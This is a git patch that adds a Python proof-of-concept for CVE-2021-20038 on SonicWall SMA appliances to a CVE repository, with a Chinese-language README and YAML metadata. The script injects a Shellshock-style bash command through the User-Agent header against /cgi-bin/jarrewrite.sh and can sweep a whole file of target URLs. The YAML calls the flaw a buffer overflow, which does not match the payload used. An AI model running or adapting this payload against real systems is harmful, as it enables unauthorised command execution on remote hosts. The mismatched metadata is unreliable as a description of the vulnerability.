From ffdc0ff813b1a34ffcdc07098f052b9f01cbca03 Mon Sep 17 00:00:00 2001
From: torsan <ShangT@buaa.edu.cn>
Date: Tue, 9 May 2023 13:02:03 +0800
Subject: [PATCH] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2021-20038?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../2021/CVE-2021-20038/CVE-2021-20038.py     | 68 +++++++++++++++++++
 .../2021/CVE-2021-20038/README.md             |  9 +++
 .../2021/yaml/CVE-2021-20038.yaml             | 19 ++++++
 other_list.yaml                               |  2 +
 4 files changed, 98 insertions(+)
 create mode 100644 cve/apache-Httpd/2021/CVE-2021-20038/CVE-2021-20038.py
 create mode 100644 cve/apache-Httpd/2021/CVE-2021-20038/README.md
 create mode 100644 cve/apache-Httpd/2021/yaml/CVE-2021-20038.yaml

diff --git a/cve/apache-Httpd/2021/CVE-2021-20038/CVE-2021-20038.py b/cve/apache-Httpd/2021/CVE-2021-20038/CVE-2021-20038.py
new file mode 100644
index 00000000..158cde4a
--- /dev/null
+++ b/cve/apache-Httpd/2021/CVE-2021-20038/CVE-2021-20038.py
@@ -0,0 +1,68 @@
+import requests
+import urllib3
+import sys
+from urllib import parse
+
+
+requests.packages.urllib3.disable_warnings()
+
+def banner():
+	print('baby test')
+
+def help():
+	print(' SonicWall RCE -h 查看帮助  ')
+	print(' SonicWall RCE -u 输入待检测url  ')
+	print(' SonicWall RCE -f 输入待检测文件  ')
+
+def poc(url):
+	path="/cgi-bin/jarrewrite.sh"
+	vulnurl=url + path
+	#print(vulnurl)
+	headers = {
+    "User-Agent": "() { :; }; echo ; /bin/bash -c id",      
+}
+	try:
+		res=requests.get(vulnurl,headers=headers,verify=False,timeout=5)
+		if "id" in res.text and res.status_code==200:
+			print(res.text+url+"is vuln 漏洞存在")
+		else:
+			print(url+"is not vuln 漏洞不存在")
+	except Exception as e:
+		print(e)
+
+def poc1(files):
+	for url in open(files):
+		url=url.strip()
+		path="/cgi-bin/jarrewrite.sh"
+		vulnurl=url + path
+		#print(vulnurl)
+		headers = {
+        "User-Agent": "() { :; }; echo ; /bin/bash -c id",      
+    }
+		try:
+			res=requests.get(vulnurl,headers=headers,verify=False,timeout=5)
+			if "id" in res.text and res.status_code==200:
+				print("[*] "+res.text+url+"is vuln 漏洞存在")
+			else:
+				print("[*] "+url+"is not vuln 漏洞不存在")
+		except Exception as e:
+			print(e)
+
+if __name__ == '__main__':
+    try:
+    	banner()
+    	print('by baby')
+    	cmd1=sys.argv[1]
+
+    	if cmd1=='-h':
+    		help()
+    	elif cmd1=='-u':
+    		cmd2=sys.argv[2]
+    		poc(cmd2)
+    	elif cmd1=='-f':
+    		cmd2=sys.argv[2]
+    		poc1(cmd2)
+    	else:
+    		print("请输入正确参数，或者-h查看帮助")
+    except:
+    	print("输入-h查看帮助")
\ No newline at end of file
diff --git a/cve/apache-Httpd/2021/CVE-2021-20038/README.md b/cve/apache-Httpd/2021/CVE-2021-20038/README.md
new file mode 100644
index 00000000..8e3778df
--- /dev/null
+++ b/cve/apache-Httpd/2021/CVE-2021-20038/README.md
@@ -0,0 +1,9 @@
+# SonicWallSSL-VPN_RCE
+CVE-2021-20038
+
+命令行传参
+-h 查看帮助
+-u 指定url
+-f 指定file文件 
+
+file内部的格式需添加http/https头
diff --git a/cve/apache-Httpd/2021/yaml/CVE-2021-20038.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-20038.yaml
new file mode 100644
index 00000000..f0246c5f
--- /dev/null
+++ b/cve/apache-Httpd/2021/yaml/CVE-2021-20038.yaml
@@ -0,0 +1,19 @@
+id: CVE-2021-20038
+source: https://github.com/vesperp/CVE-2021-20038-SonicWall-RCE
+info:
+  name:SonicWall 安全移动接入 (SMA) 系列解决方案简化了端到端安全远程访问，可跨本地、云和混合数据中心访问托管的资源，对应用程序实施策略访问控制，在用户和设备标识之间建立信任关系，之后可对应用进行多层安全控制，让用户可随时随地安全工作。
+  severity: critical
+  description: |
+    A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.
+  scope-of-influence:
+    SMA 200, 210, 400, 410 and 500v firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-20038#match-7894400
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-20038
+    cwe-id: CWE-787, CWE-121
+    cnvd-id: None
+    kve-id: None
+  tags: cve2021,Apache,RCE
\ No newline at end of file
diff --git a/other_list.yaml b/other_list.yaml
index 3082ba01..06280aaf 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -40,6 +40,8 @@ cve:
   apache-Struts:
     - CVE-2017-9805
     - CVE-2018-11776
+  apache-Httpd:
+    - CVE-2021-20038
   unzip:
     - CVE-2022-0529
   django: